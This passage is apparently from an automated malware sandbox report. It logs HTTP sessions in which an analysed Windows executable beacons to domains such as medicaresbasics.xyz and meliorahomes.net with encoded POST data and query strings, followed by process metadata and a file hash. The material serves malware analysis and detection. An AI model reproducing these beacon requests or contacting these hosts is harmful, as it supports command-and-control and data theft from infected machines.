                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 38 37 44 6c 37 58 35 41 61 4b 59 75 65 6a 48 67 65 62 6c 4c 72 6b 48 31 39 4b 76 62 79 32 41 6f 52 4c 66 59 57 4e 55 76 77 73 49 6e 38 2b 77 58 67 3d 3d
                                                Data Ascii: A2jpdtl=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX87Dl7X5AaKYuejHgeblLrkH19Kvby2AoRLfYWNUvwsIn8+wXg==
                                                Jan 10, 2025 21:07:26.470170021 CET73INHTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.7502573.33.130.190807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:28.581547976 CET825OUTPOST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 240
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 31 38 6d 48 37 48 37 47 62 39 57 51 62 51 4b 50 6b 59 64 4e 58 4a 61 67 37 72 39 46 52 78 38 69 2f 36 6e 64 6c 6f 69 63 35 4b 42 34 48 77 36 48 52 77 70 73 7a 74 34 51 31 6d 42 75 5a 32 52 71 38 43 39 61 6b 77 6e 78 34 4d 7a 66 6d 57 6c 32 43 4e 72 4b 6f 30 46 6b 53 35 57 54 63 32 45 42 6f 50 70 39 58 67 51 33 34 30 4d 41 33 49 4f 4a 6b 62 69 76 78 53 59 63 62 6a 38 74 48 45 4d 74 66 37 72 6f 69 6c 36 38 58 4a 56 36 63 38 78 2f 75 5a 4d 55 72 31 71 51 50 48 56 30 35 31 77 48 4a 69 71 75 66 30 42 63 63 4b 4f 76 44 4d 34 2f 57 35 56 38 74 77 42 50 32 62 6e 66 59 3d
                                                Data Ascii: A2jpdtl=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo18mH7H7Gb9WQbQKPkYdNXJag7r9FRx8i/6ndloic5KB4Hw6HRwpszt4Q1mBuZ2Rq8C9akwnx4MzfmWl2CNrKo0FkS5WTc2EBoPp9XgQ340MA3IOJkbivxSYcbj8tHEMtf7roil68XJV6c8x/uZMUr1qQPHV051wHJiquf0BccKOvDM4/W5V8twBP2bnfY=
                                                Jan 10, 2025 21:07:29.036501884 CET73INHTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.7502583.33.130.190807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:31.124914885 CET1838OUTPOST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 1252
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 39 38 6c 30 44 48 70 31 44 39 58 51 62 51 4a 50 6b 5a 64 4e 57 56 61 67 6a 76 39 46 64 50 38 6b 37 36 31 76 74 6f 6b 6f 56 4b 55 49 48 77 79 6e 52 74 6d 4d 7a 43 34 51 6c 63 42 75 4a 32 52 71 38 43 39 63 41 77 33 54 63 4d 38 2f 6d 4a 69 32 43 4a 76 4b 70 68 46 6b 71 70 57 53 70 44 46 77 55 50 6f 65 76 67 63 6b 41 30 41 41 33 4b 50 4a 6c 47 69 76 38 4b 59 66 76 76 38 74 62 69 4d 71 7a 37 70 4d 37 64 69 6f 50 64 47 72 73 59 78 39 47 62 4a 33 7a 66 79 7a 72 4b 64 6b 6c 33 7a 45 78 50 71 4d 79 35 4b 4a 46 39 52 74 43 2f 39 2b 53 61 61 37 31 35 57 71 69 75 39 6f 76 7a 4e 6d 58 47 5a 36 69 72 68 41 51 78 70 62 4f 39 6f 59 53 55 2f 38 78 66 68 43 5a 6e 63 70 4e 41 64 74 56 32 30 5a 55 48 36 49 30 6c 35 76 71 71 30 55 73 6c 46 72 50 36 67 7a 67 77 5a 76 35 4c 2b 58 6f 2b 49 68 6e 37 73 64 6d 6c 42 4c 56 70 73 65 51 65 69 30 66 38 71 56 61 4f 36 7a 50 39 44 79 [TRUNCATED]
                                                Data Ascii: A2jpdtl=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo98l0DHp1D9XQbQJPkZdNWVagjv9FdP8k761vtokoVKUIHwynRtmMzC4QlcBuJ2Rq8C9cAw3TcM8/mJi2CJvKphFkqpWSpDFwUPoevgckA0AA3KPJlGiv8KYfvv8tbiMqz7pM7dioPdGrsYx9GbJ3zfyzrKdkl3zExPqMy5KJF9RtC/9+Saa715Wqiu9ovzNmXGZ6irhAQxpbO9oYSU/8xfhCZncpNAdtV20ZUH6I0l5vqq0UslFrP6gzgwZv5L+Xo+Ihn7sdmlBLVpseQei0f8qVaO6zP9Dy4htFzSgEuBGKLQh9rUcep9TYRS6RinzcsiQfsWFyZyWpPE/mZ/aJvn3Oh83Vs/9UuMS+bqT6VLRBbAar68nPH3WjsWAXax8+iAa4HY82HhY6/BLGU0aCfRUNiHFujA//xhRVnICDbLPvMUniwIuFs7uMy1rqEq7zrzLNkHaAwalxjQpUoJH01lHT7mu4rrOqGW0kK6UYDnASOjB6Gas1L+ljlumnHrdCHv4LZNsxxnBW+SgBMvjJPwVpzhOg0dtv2tSj7QzhH7eg7E2I50PppkcgUPecJaz18hKZsP2RTB93xiYxWih6laaWFrBSHjVeoiUz0ST70KeG19ay/bJ/C+f7DhuoX0k/8wEUt02u9Vs7zYCrN3lVuI30nNhlCP+pMbxtN96p7MMHe3Zu9ou0FK723rXZgDU0E1YJA9cb0S01J3Ng/1C4J86yj4uhbeKFdnMdnbA1410rFKzbuOL1sCgkmeP7fZKcEvdZq0RPOppAHSwv+rQUEiA9G3ClMJ+rNLkKnfc7anAIbecmeBKSg9vhaE9LH9/aFhdT0pmxQJT33oL7n29OFAjmk64F7o1A6OsgufZpACkCIehIB+H4WlPStIpegVVjDTj9j8wkOnC1vw5Vcyi3YmVVJeYjEOHQqvKfDgxqlFCioXBRAwJjTJHYIcAx32niD6 [TRUNCATED]
                                                Jan 10, 2025 21:07:31.570842028 CET73INHTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.7502593.33.130.190807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:33.665636063 CET525OUTGET /fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Jan 10, 2025 21:07:34.215807915 CET394INHTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:34 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 44 75 4c 75 2f 5a 4a 45 5a 30 76 73 61 37 4e 4d 57 36 59 31 6c 75 77 4d 73 54 70 55 6a 54 69 61 7a 78 69 4b 73 46 71 4d 6a 6f 63 4a 6d 55 2b 57 7a 30 6e 2b 53 46 44 77 4a 72 42 41 57 34 4c 7a 4a 57 4c 5a 30 30 67 67 74 52 33 46 6c 4e 39 47 75 70 70 47 64 72 2f 39 34 6d 68 78 75 73 44 4d 35 68 4e 46 47 66 30 50 56 70 4e 6a 79 37 6f 46 68 42 4d 52 33 76 61 66 6c 47 44 4f 72 63 46 68 61 53 75 4a 54 69 77 44 4d 57 55 6d 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41"}</script></head></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.7502608.217.17.192807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:47.382741928 CET796OUTPOST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 68 38 6d 32 31 4e 53 2b 51 35 7a 66 35 4c 68 66 57 78 66 6f 43 49 67 4d 79 31 41 55 62 53 4a 74 56 6f 4b 33 65 64 6f 6e 43 6d 46 6a 30 52 30 53 32 44 6f 4c 5a 71 55 4f 34 4a 76 59 78 68 55 37 33 4a 78 38 4c 63 2f 2f 37 74 47 53 62 6d 32 4f 4c 6b 47 49 50 50 70 61 71 49 4b 4f 42 34 48 62 4b 48 47 48 52 4f 6a 62 38 77 55 71 41 75 7a 63 6f 7a 66 68 2b 4d 43 41 4b 63 78 61 46 37 62 2b 73 56 43 6f 33 52 54 69 79 6c 78 33 59 69 6f 36 70 37 64 69 76 6b 77 53 32 34 35 33 4f 2b 43 71 46 75 4b 6e 67 55 38 37 46 7a 55 39 51 79 4b 39 62 78 6d 67 5a 55 6e 47 41 67 42 71 66 45 6e 74 51 45 2f 46 6a 51 3d 3d
                                                Data Ascii: A2jpdtl=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4JvYxhU73Jx8Lc//7tGSbm2OLkGIPPpaqIKOB4HbKHGHROjb8wUqAuzcozfh+MCAKcxaF7b+sVCo3RTiylx3Yio6p7divkwS2453O+CqFuKngU87FzU9QyK9bxmgZUnGAgBqfEntQE/FjQ==
                                                Jan 10, 2025 21:07:48.289911985 CET393INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:48 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.7502618.217.17.192807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:49.937206984 CET816OUTPOST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 240
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 74 74 56 49 36 33 66 5a 38 6e 50 47 46 6a 2f 78 30 62 34 6a 6f 4d 5a 71 59 47 34 4a 6a 59 78 67 77 37 33 49 42 38 4b 72 6a 38 35 39 47 51 41 57 32 49 49 55 47 49 50 50 70 61 71 4d 62 72 42 38 72 62 4b 58 32 48 52 76 6a 59 31 51 56 59 49 4f 7a 63 73 7a 66 74 2b 4d 43 2b 4b 65 55 42 46 2f 72 2b 73 58 61 6f 77 44 33 68 34 6c 77 38 63 69 70 46 35 4a 45 2b 67 33 49 73 75 72 74 36 58 38 65 42 4a 34 4c 46 36 32 77 58 62 69 73 47 55 77 75 4c 4d 58 37 56 62 56 6a 65 4e 43 31 4c 41 7a 43 48 64 57 65 42 31 69 6d 6c 2b 72 78 76 46 58 46 6e 57 49 7a 76 4d 32 73 46 54 65 41 3d
                                                Data Ascii: A2jpdtl=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgttVI63fZ8nPGFj/x0b4joMZqYG4JjYxgw73IB8Krj859GQAW2IIUGIPPpaqMbrB8rbKX2HRvjY1QVYIOzcszft+MC+KeUBF/r+sXaowD3h4lw8cipF5JE+g3Isurt6X8eBJ4LF62wXbisGUwuLMX7VbVjeNC1LAzCHdWeB1iml+rxvFXFnWIzvM2sFTeA=
                                                Jan 10, 2025 21:07:50.866570950 CET393INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:50 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.7502628.217.17.192807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:52.487870932 CET1829OUTPOST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 1252
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 37 66 2b 32 7a 75 36 2b 48 4a 7a 41 31 72 68 66 44 68 66 53 43 49 6b 4d 79 30 30 45 62 67 6c 74 56 37 79 33 66 2b 51 6e 4f 47 46 6a 6a 42 30 65 34 6a 6f 52 5a 70 6f 43 34 49 66 49 78 69 34 37 6d 62 4a 38 61 4f 58 38 77 39 47 51 49 32 32 4a 4c 6b 47 64 50 4f 46 65 71 49 2f 72 42 38 72 62 4b 55 2b 48 58 2b 6a 59 7a 51 55 71 41 75 7a 51 6f 7a 65 79 2b 4d 61 78 4b 65 41 52 47 4f 58 2b 73 33 4b 6f 31 78 76 68 2b 31 77 2b 62 69 70 64 35 4a 34 58 67 33 55 4b 75 6f 77 74 58 38 6d 42 4c 63 4b 2b 76 43 38 44 4d 53 70 66 4c 44 4b 48 45 30 71 6b 45 6b 2f 44 4b 52 42 49 4e 42 4f 37 59 58 53 32 2b 6c 37 46 6f 64 5a 64 41 57 30 7a 66 50 4f 69 66 44 30 59 45 70 65 57 6e 44 35 44 62 6d 55 6e 4a 39 46 50 38 71 69 66 4d 4e 63 6f 6a 61 76 76 33 6a 47 75 2f 62 76 77 36 30 6b 71 4b 6e 64 69 30 50 6c 7a 45 5a 37 30 74 71 35 6b 59 41 6b 2b 2b 47 69 46 39 46 51 54 50 50 44 6b 4e 4e 74 70 34 65 31 31 51 59 54 77 55 66 54 30 63 66 6f 6a 4f 31 35 43 38 47 4d 72 7a 70 [TRUNCATED]
                                                Data Ascii: A2jpdtl=jai/NoPHoBCQ7f+2zu6+HJzA1rhfDhfSCIkMy00EbgltV7y3f+QnOGFjjB0e4joRZpoC4IfIxi47mbJ8aOX8w9GQI22JLkGdPOFeqI/rB8rbKU+HX+jYzQUqAuzQozey+MaxKeARGOX+s3Ko1xvh+1w+bipd5J4Xg3UKuowtX8mBLcK+vC8DMSpfLDKHE0qkEk/DKRBINBO7YXS2+l7FodZdAW0zfPOifD0YEpeWnD5DbmUnJ9FP8qifMNcojavv3jGu/bvw60kqKndi0PlzEZ70tq5kYAk++GiF9FQTPPDkNNtp4e11QYTwUfT0cfojO15C8GMrzpY+P0Gi1jM8SLgmxy7KpyJ2AfWil1Cya7QGUkqLPqLkKj4BbgEy793DWi+FHYmcJt3l+V66ltnk+fad8tB+1dI4dNjrKMxXjxNrAT7oIImgudQV9zNInaKDyfKshU8oqT9aRBgW45J22rbx/bqaadi6tgDPQEE/Ec07VbAFb0yvWcB0cMuBKloXagnuyCeI2+hPL3ykjR9Feg5vfPHlhLeXB0j8aBreiZZV2pdCHcTobpJ4sHysBVc9jzafVQa65kvsSm1iyZADaKX9lWZbo7cfquQZyWFfBZ7lYq+8ImOq1MQ1Fv+UjcLk6ry7heUqLbpyjwljxZg6ZUyeVbXWj3qKpjdDz6XANhmjkXcB+ly8IqgHDmsnNvqSRcHnxugw0EoSId+GZwXIhRvz3IaW/jQ1VHN07wTzuaFNgui+rcy83eg06wxnxCuujYjv1EA0TcZfl7xc0MkWEBtl2NoPVjPU0N5VVBIZjtXxPRJoPuL0mgSWtY2rOWQrGyDUf/o0HAzIAPuYj31ENfehCOiC/MljP0KkU/GAqohurxVLLumD5XP8GfAsqevbu6PcVwLLqZm1KpqhQ1FbtDTEJqyCCrc8BiN1igpEtDRyE8oF0QXg0g4yan+2ncd6TxePyCyTGxG7fnhqb0rtSkSGoA8FsdepazevDxwCuvrA [TRUNCATED]
                                                Jan 10, 2025 21:07:53.386699915 CET393INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:53 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.7502638.217.17.192807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:55.606630087 CET522OUTGET /ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Jan 10, 2025 21:07:56.497524023 CET393INHTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:56 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:5
                                                Start time:15:05:51
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0xbf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:15:05:52
                                                Start date:10/01/2025
